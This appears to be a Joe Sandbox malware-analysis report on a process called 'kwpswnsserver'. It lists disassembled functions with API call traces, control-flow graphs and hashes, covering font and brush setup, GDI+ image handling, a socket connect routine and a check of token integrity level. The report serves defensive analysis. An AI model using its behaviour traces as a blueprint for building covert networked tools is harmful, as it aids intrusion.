                                                                  • API ID: Crypt$BinaryParamString$AcquireContextExceptionImportRaise
                                                                  • String ID:
                                                                  • API String ID: 2873263705-0
                                                                  • Opcode ID: c8b280bd11aed5df6fba9d4ee3a1975e5376f0b7700b53c295a7d9f2d9880859
                                                                  • Instruction ID: 63077be3662ca17d56bf44288118608eccb8e1e25d2ba008de984ed626f1d874
                                                                  • Opcode Fuzzy Hash: c8b280bd11aed5df6fba9d4ee3a1975e5376f0b7700b53c295a7d9f2d9880859
                                                                  • Instruction Fuzzy Hash: 92121DB0A143588FDB24DF68CA557DDBBF0BF49304F0089A9D449A7B50DB749A88CF92
                                                                  Function 04273360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Time_memmovetime
                                                                  • String ID:
                                                                  • API String ID: 1463837790-0
                                                                  • Opcode ID: d68d357364c59024fa4cd1d0d78284c097a6fb765743c5a483af3955824e31ac
                                                                  • Instruction ID: 84e3945d28da1cd4c8458661703599577f125be449a576e34cc3987a2a391644
                                                                  • Opcode Fuzzy Hash: d68d357364c59024fa4cd1d0d78284c097a6fb765743c5a483af3955824e31ac
                                                                  • Instruction Fuzzy Hash: 9451CF72720202AFD725DFA9C8D0A6AB7A5BF84214714866CED19CB701EB31F851DB90
                                                                  Function 6C89E792 Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 356stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 94 6c89e792-6c89e7e8 call 6c89f57e call 6c883e38 GetDeviceCaps 99 6c89e7ea-6c89e7f6 94->99 100 6c89e800-6c89e808 94->100 99->100 101 6c89e7f8 99->101 102 6c89e80a-6c89e80e 100->102 103 6c89e81e-6c89e826 100->103 101->100 102->103 104 6c89e810-6c89e818 call 6c883130 DeleteObject 102->104 105 6c89e828-6c89e82c 103->105 106 6c89e83c-6c89e844 103->106 104->103 105->106 108 6c89e82e-6c89e836 call 6c883130 DeleteObject 105->108 109 6c89e85a-6c89e862 106->109 110 6c89e846-6c89e84a 106->110 108->106 112 6c89e878-6c89e880 109->112 113 6c89e864-6c89e868 109->113 110->109 111 6c89e84c-6c89e854 call 6c883130 DeleteObject 110->111 111->109 118 6c89e882-6c89e886 112->118 119 6c89e896-6c89e89e 112->119 113->112 117 6c89e86a-6c89e872 call 6c883130 DeleteObject 113->117 117->112 118->119 123 6c89e888-6c89e890 call 6c883130 DeleteObject 118->123 124 6c89e8a0-6c89e8a4 119->124 125 6c89e8b4-6c89e8bc 119->125 123->119 124->125 130 6c89e8a6-6c89e8ae call 6c883130 DeleteObject 124->130 126 6c89e8be-6c89e8c2 125->126 127 6c89e8d2-6c89e8da 125->127 126->127 132 6c89e8c4-6c89e8cc call 6c883130 DeleteObject 126->132 133 6c89e8dc-6c89e8e0 127->133 134 6c89e8f0-6c89e8f8 127->134 130->125 132->127 133->134 138 6c89e8e2-6c89e8ea call 6c883130 DeleteObject 133->138 139 6c89e8fa-6c89e8fe 134->139 140 6c89e90e-6c89e916 134->140 138->134 139->140 145 6c89e900-6c89e908 call 6c883130 DeleteObject 139->145 141 6c89e918-6c89e91c 140->141 142 6c89e92c-6c89e989 call 6c89f243 call 6c9c44a0 GetTextCharsetInfo 140->142 141->142 146 6c89e91e-6c89e926 call 6c883130 DeleteObject 141->146 156 6c89e98b-6c89e98e 142->156 157 6c89e990-6c89e994 142->157 145->140 146->142 158 6c89e997-6c89e9bd lstrcpyW 156->158 157->158 159 6c89e996 157->159 160 6c89ea2b-6c89ea6c CreateFontIndirectW call 6c883104 call 6c9d4595 158->160 161 6c89e9bf-6c89e9c6 158->161 159->158 172 6c89ea6e-6c89ea70 160->172 173 6c89ea73-6c89eb79 CreateFontIndirectW call 6c883104 call 6c89f243 CreateFontIndirectW call 6c883104 CreateFontIndirectW call 6c883104 CreateFontIndirectW call 6c883104 GetSystemMetrics lstrcpyW CreateFontIndirectW call 6c883104 GetStockObject 160->173 161->160 162 6c89e9c8-6c89e9e2 EnumFontFamiliesW 161->162 164 6c89e9f9-6c89ea16 EnumFontFamiliesW 162->164 165 6c89e9e4-6c89e9f7 lstrcpyW 162->165 167 6c89ea18-6c89ea1d 164->167 168 6c89ea1f 164->168 165->160 170 6c89ea24-6c89ea25 lstrcpyW 167->170 168->170 170->160 172->173 186 6c89ec49-6c89ec56 call 6c89f284 173->186 187 6c89eb7f-6c89eb8e GetObjectW 173->187 192 6c89ec81-6c89ec83 186->192 187->186 189 6c89eb94-6c89ec44 lstrcpyW CreateFontIndirectW call 6c883104 CreateFontIndirectW call 6c883104 GetObjectW CreateFontIndirectW call 6c883104 CreateFontIndirectW call 6c883104 187->189 189->186 195 6c89ec58-6c89ec5f 192->195 196 6c89ec85-6c89ec95 call 6c87d520 192->196 197 6c89ecab-6c89ecb0 call 6c89773a 195->197 198 6c89ec61-6c89ec6b call 6c88ac85 195->198 201 6c89ec9a-6c89ecaa call 6c883e8d call 6c89f601 196->201 198->192 211 6c89ec6d-6c89ec7d 198->211 211->192
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C89E79C
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 6C89E7BC
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E818
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E836
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E854
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E872
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E890
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8AE
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8CC
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E8EA
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E908
                                                                  • DeleteObject.GDI32(00000000), ref: 6C89E926
                                                                  • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C89E95E
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6C89E9B3
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,6C89F43F,Segoe UI), ref: 6C89E9DA
                                                                  • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C89E9ED
                                                                  • EnumFontFamiliesW.GDI32(?,00000000,6C89F43F,Tahoma), ref: 6C89EA0B
                                                                  • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C89EA25
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EA2F
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EA77
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EAB6
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EAE2
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EB03
                                                                  • GetSystemMetrics.USER32(00000048), ref: 6C89EB22
                                                                  • lstrcpyW.KERNEL32(?,Marlett), ref: 6C89EB35
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EB3F
                                                                  • GetStockObject.GDI32(00000011), ref: 6C89EB6B
                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C89EB86
                                                                  • lstrcpyW.KERNEL32(?,Arial), ref: 6C89EBC7
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EBD1
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EBEA
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 6C89EC08
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EC16
                                                                  • CreateFontIndirectW.GDI32(?), ref: 6C89EC37
                                                                    • Part of subcall function 6C89F284: __EH_prolog3_GS.LIBCMT ref: 6C89F28B
                                                                    • Part of subcall function 6C89F284: GetTextMetricsW.GDI32(?,?), ref: 6C89F2C0
                                                                    • Part of subcall function 6C89F284: GetTextMetricsW.GDI32(?,?), ref: 6C89F300
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
                                                                  • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                  • API String ID: 2837096512-1395034203
                                                                  • Opcode ID: 591e504f400c0d64b4d5101e283c2027d13173182ce43dd487dd54b88e438ea0
                                                                  • Instruction ID: 393259d328a85fa3c775e926b526e430ce789f6b906a5fccb42511594fd78367
                                                                  • Opcode Fuzzy Hash: 591e504f400c0d64b4d5101e283c2027d13173182ce43dd487dd54b88e438ea0
                                                                  • Instruction Fuzzy Hash: 76E1A271A003599FDF25DBB4CE58BDDBBB8BF05308F108969A01AE7680DB74A949CF50
                                                                  Function 6C89E374 Relevance: 64.8, APIs: 43, Instructions: 298COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 215 6c89e374-6c89e393 call 6c89f515 GetSysColor 218 6c89e395-6c89e39f GetSysColor 215->218 219 6c89e3a4 215->219 218->219 220 6c89e3a1-6c89e3a2 218->220 221 6c89e3a6-6c89e3b6 GetSysColor 219->221 220->221 222 6c89e3c9 221->222 223 6c89e3b8-6c89e3c2 GetSysColor 221->223 225 6c89e3cb-6c89e502 call 6c883e38 GetDeviceCaps GetSysColor * 21 222->225 223->222 224 6c89e3c4-6c89e3c7 223->224 224->225 228 6c89e50d-6c89e519 GetSysColor 225->228 229 6c89e504-6c89e50b 225->229 230 6c89e51f-6c89e535 GetSysColorBrush 228->230 229->230 231 6c89e53b-6c89e548 GetSysColorBrush 230->231 232 6c89e78c-6c89e791 call 6c89773a 230->232 231->232 233 6c89e54e-6c89e55b GetSysColorBrush 231->233 233->232 235 6c89e561-6c89e6ac call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreateSolidBrush call 6c883104 call 6c88315a CreatePen call 6c883104 call 6c88315a CreatePen call 6c883104 call 6c88315a CreatePen call 6c883104 233->235 277 6c89e6bb-6c89e6c2 235->277 278 6c89e6ae-6c89e6b2 235->278 280 6c89e728-6c89e734 call 6c89f342 277->280 281 6c89e6c4-6c89e726 CreateSolidBrush call 6c883104 277->281 278->277 279 6c89e6b4-6c89e6b6 call 6c88315a 278->279 279->277 280->232 288 6c89e736-6c89e76a call 6c883104 CreatePatternBrush call 6c883104 call 6c87d520 280->288 287 6c89e76f-6c89e78b call 6c8d1eb9 call 6c883e8d call 6c89f5ed 281->287 288->287
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89E37B
                                                                  • GetSysColor.USER32(00000016), ref: 6C89E384
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E397
                                                                  • GetSysColor.USER32(00000015), ref: 6C89E3AE
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E3BA
                                                                  • GetDeviceCaps.GDI32(?,0000000C), ref: 6C89E3E2
                                                                  • GetSysColor.USER32(0000000F), ref: 6C89E3F0
                                                                  • GetSysColor.USER32(00000010), ref: 6C89E3FE
                                                                  • GetSysColor.USER32(00000015), ref: 6C89E40C
                                                                  • GetSysColor.USER32(00000016), ref: 6C89E41A
                                                                  • GetSysColor.USER32(00000014), ref: 6C89E428
                                                                  • GetSysColor.USER32(00000012), ref: 6C89E436
                                                                  • GetSysColor.USER32(00000011), ref: 6C89E444
                                                                  • GetSysColor.USER32(00000006), ref: 6C89E44F
                                                                  • GetSysColor.USER32(0000000D), ref: 6C89E45A
                                                                  • GetSysColor.USER32(0000000E), ref: 6C89E465
                                                                  • GetSysColor.USER32(00000005), ref: 6C89E470
                                                                  • GetSysColor.USER32(00000008), ref: 6C89E47E
                                                                  • GetSysColor.USER32(00000009), ref: 6C89E489
                                                                  • GetSysColor.USER32(00000007), ref: 6C89E494
                                                                  • GetSysColor.USER32(00000002), ref: 6C89E49F
                                                                  • GetSysColor.USER32(00000003), ref: 6C89E4AA
                                                                  • GetSysColor.USER32(0000001B), ref: 6C89E4B8
                                                                  • GetSysColor.USER32(0000001C), ref: 6C89E4C6
                                                                  • GetSysColor.USER32(0000000A), ref: 6C89E4D4
                                                                  • GetSysColor.USER32(0000000B), ref: 6C89E4E2
                                                                  • GetSysColor.USER32(00000013), ref: 6C89E4F0
                                                                  • GetSysColor.USER32(0000001A), ref: 6C89E519
                                                                  • GetSysColorBrush.USER32(00000010), ref: 6C89E52A
                                                                  • GetSysColorBrush.USER32(00000014), ref: 6C89E53D
                                                                  • GetSysColorBrush.USER32(00000005), ref: 6C89E550
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E571
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E58F
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5AD
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5CE
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E5EC
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E60A
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E628
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E64E
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E672
                                                                  • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C89E696
                                                                  • CreateSolidBrush.GDI32(?), ref: 6C89E714
                                                                  • CreatePatternBrush.GDI32(00000000), ref: 6C89E752
                                                                    • Part of subcall function 6C88315A: DeleteObject.GDI32(00000000), ref: 6C883169
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                                  • String ID:
                                                                  • API String ID: 3754413814-0
                                                                  • Opcode ID: 926ecd4c5b5eac795c8323e0adacec8ed19504f018b0a6f37d8276f492f4dca5
                                                                  • Instruction ID: 19d63ce017235c68446f8cb69f06d8d828ba8759ab0b5ae7e542226da14a1910
                                                                  • Opcode Fuzzy Hash: 926ecd4c5b5eac795c8323e0adacec8ed19504f018b0a6f37d8276f492f4dca5
                                                                  • Instruction Fuzzy Hash: 9EC1A171B00722AFDB29AF788D58799BB74BF05B09F008625E219D7AC0DB74A915CFD0
                                                                  Function 04279E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 476 4279e50-4279e85 GdipGetImagePixelFormat 477 4279e87 476->477 478 4279e8a-4279eb1 476->478 477->478 479 4279eb3-4279ec3 478->479 480 4279ec9-4279ecf 478->480 479->480 481 4279ed1-4279ee1 480->481 482 4279eeb-4279f04 GdipGetImageHeight 480->482 481->482 483 4279f06 482->483 484 4279f09-4279f2c GdipGetImageWidth 482->484 483->484 485 4279f31-4279f4e call 4279c30 484->485 486 4279f2e 484->486 489 427a055-427a05a 485->489 490 4279f54-4279f68 485->490 486->485 491 427a2a4-427a2ba call 427f00a 489->491 492 427a0cf-427a0d7 490->492 493 4279f6e-4279f87 GdipGetImagePaletteSize 490->493 495 427a0dd-427a11a GdipBitmapLockBits 492->495 496 427a20a-427a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 492->496 497 4279f8c-4279f98 493->497 498 4279f89 493->498 500 427a11c-427a121 495->500 501 427a14a-427a177 495->501 502 427a281-427a283 496->502 503 4279fb2-4279fba 497->503 504 4279f9a-4279fa5 call 4279650 497->504 498->497 507 427a123 500->507 508 427a140-427a145 500->508 511 427a1bf-427a1de GdipBitmapUnlockBits 501->511 512 427a179-427a18e call 42807f2 501->512 509 427a285 502->509 510 427a2a2 502->510 505 4279fd0-4279fd5 call 4271280 503->505 506 4279fbc-4279fca call 427f673 503->506 504->503 521 4279fa7-4279fb0 call 428c660 504->521 524 4279fda-4279fe5 505->524 506->524 531 4279fcc-4279fce 506->531 516 427a12b-427a13e call 427f639 507->516 508->491 518 427a28d-427a2a0 call 427f639 509->518 510->491 511->502 514 427a1e4-427a1e7 511->514 528 427a200-427a205 call 4271280 512->528 529 427a190-427a197 512->529 514->502 516->508 540 427a125 516->540 518->510 534 427a287 518->534 533 4279fe7-4279fe9 521->533 524->533 528->496 529->528 535 427a1f6-427a1fb call 4271280 529->535 536 427a19e-427a1bd 529->536 537 427a1ec-427a1f1 call 4271280 529->537 531->533 541 427a016-427a030 GdipGetImagePalette 533->541 542 4279feb-4279fed 533->542 534->518 535->528 536->511 536->512 537->535 540->516 543 427a032-427a038 541->543 544 427a03b-427a040 541->544 547 4279fef 542->547 548 427a00c-427a011 542->548 543->544 549 427a042-427a048 544->549 550 427a04a-427a050 call 427cca0 544->550 551 4279ff7-427a00a call 427f639 547->551 548->491 549->550 553 427a05f-427a063 549->553 550->489 551->548 558 4279ff1 551->558 556 427a065 553->556 557 427a0a0-427a0c9 call 4279d80 SetDIBColorTable call 427a320 553->557 559 427a068-427a098 556->559 557->492 558->551 559->559 562 427a09a 559->562 562->557
                                                                  APIs
                                                                  • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279E7B
                                                                  • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279EFC
                                                                  • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279F24
                                                                  • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 04279F7F
                                                                  • _malloc.LIBCMT ref: 04279FC0
                                                                    • Part of subcall function 0427F673: __FF_MSGBANNER.LIBCMT ref: 0427F68C
                                                                    • Part of subcall function 0427F673: __NMSG_WRITE.LIBCMT ref: 0427F693
                                                                    • Part of subcall function 0427F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76), ref: 0427F6B8
                                                                  • _free.LIBCMT ref: 0427A000
                                                                  • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0427A028
                                                                  • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0427A0B7
                                                                  • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0427A112
                                                                  • _free.LIBCMT ref: 0427A134
                                                                  • _memcpy_s.LIBCMT ref: 0427A183
                                                                  • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0427A1D0
                                                                  • GdipCreateBitmapFromScan0.GDIPLUS(?,?,04295A78,00022009,?,00000000,?,00000000), ref: 0427A22C
                                                                  • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0427A24C
                                                                  • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0427A267
                                                                  • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0427A274
                                                                  • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0427A27B
                                                                  • _free.LIBCMT ref: 0427A296
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                  • String ID: &
                                                                  • API String ID: 640422297-3042966939
                                                                  • Opcode ID: 9aa1895cb4b42337261f11cd3cf797da11cda727b91545088d4f900a7fd48aa4
                                                                  • Instruction ID: 7b7795262fced4a9dcd42cf9360b7a9076dd78b7372c6375c5445139271d0164
                                                                  • Opcode Fuzzy Hash: 9aa1895cb4b42337261f11cd3cf797da11cda727b91545088d4f900a7fd48aa4
                                                                  • Instruction Fuzzy Hash: 27D13FF1B102199BDB20DF55DC84BAAB7B4EF48314F0085ADE609A7201D774AEC5CFA9
                                                                  Function 04272DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ResetEvent.KERNEL32(?), ref: 04272DBB
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 04272DC7
                                                                  • timeGetTime.WINMM ref: 04272DCD
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 04272DFA
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04272E26
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04272E32
                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 04272E51
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04272E5D
                                                                  • gethostbyname.WS2_32(00000000), ref: 04272E6B
                                                                  • htons.WS2_32(?), ref: 04272E8D
                                                                  • connect.WS2_32(?,?,00000010), ref: 04272EAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                  • String ID: 0u
                                                                  • API String ID: 640718063-3203441087
                                                                  • Opcode ID: 53c05309b8fc4a9c63bbe3b2a2dfaebfa5ee0fd5adaf811f02822aa6349821b9
                                                                  • Instruction ID: e184d76835421f93e1256d162cdbb277f5e04890d097c0cd2589d94238db1257
                                                                  • Opcode Fuzzy Hash: 53c05309b8fc4a9c63bbe3b2a2dfaebfa5ee0fd5adaf811f02822aa6349821b9
                                                                  • Instruction Fuzzy Hash: E3615071B50304BFE720DFA8EC45FAAB7B8FF48B10F104569F655A72C0DAB4A9048B65
                                                                  Function 04276A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 04276A94
                                                                  • wsprintfW.USER32 ref: 04276AA7
                                                                    • Part of subcall function 04276910: GetCurrentProcessId.KERNEL32(5EF26BF0,00000000,00000000,75BF73E0,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276938
                                                                    • Part of subcall function 04276910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276947
                                                                    • Part of subcall function 04276910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 04276960
                                                                    • Part of subcall function 04276910: CloseHandle.KERNEL32(00000000,?,00000000,042910DB,000000FF,?,04276AB3,00000000), ref: 0427696B
                                                                  • _memset.LIBCMT ref: 04276AC2
                                                                  • GetVersionExW.KERNEL32(?), ref: 04276ADB
                                                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 04276B12
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 04276B19
                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04276B3F
                                                                  • GetLastError.KERNEL32 ref: 04276B49
                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 04276B5D
                                                                  • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04276B85
                                                                  • GetSidSubAuthorityCount.ADVAPI32 ref: 04276B98
                                                                  • GetSidSubAuthority.ADVAPI32(00000000), ref: 04276BA6
                                                                  • LocalFree.KERNEL32(?), ref: 04276BB5
                                                                  • CloseHandle.KERNEL32(?), ref: 04276BC2
                                                                  • wsprintfW.USER32 ref: 04276C1B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                  • String ID: -N/$NO/$None/%s
                                                                  • API String ID: 3036438616-3095023699
                                                                  • Opcode ID: d34d8821fd75beef8aaa88ad26cc3dc62175e7e487746cae1db95eb3e9fedb90
                                                                  • Instruction ID: e7b0a88417406900516f498f12049b9a4f9477f5a0c8da0ba96cb7ecc7237573
                                                                  • Opcode Fuzzy Hash: d34d8821fd75beef8aaa88ad26cc3dc62175e7e487746cae1db95eb3e9fedb90
                                                                  • Instruction Fuzzy Hash: 7541B271B10615BFDB249F64DC8CFEA7B78EB09724F004499E609A6141EA38ED94CFB1
                                                                  Function 0427AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
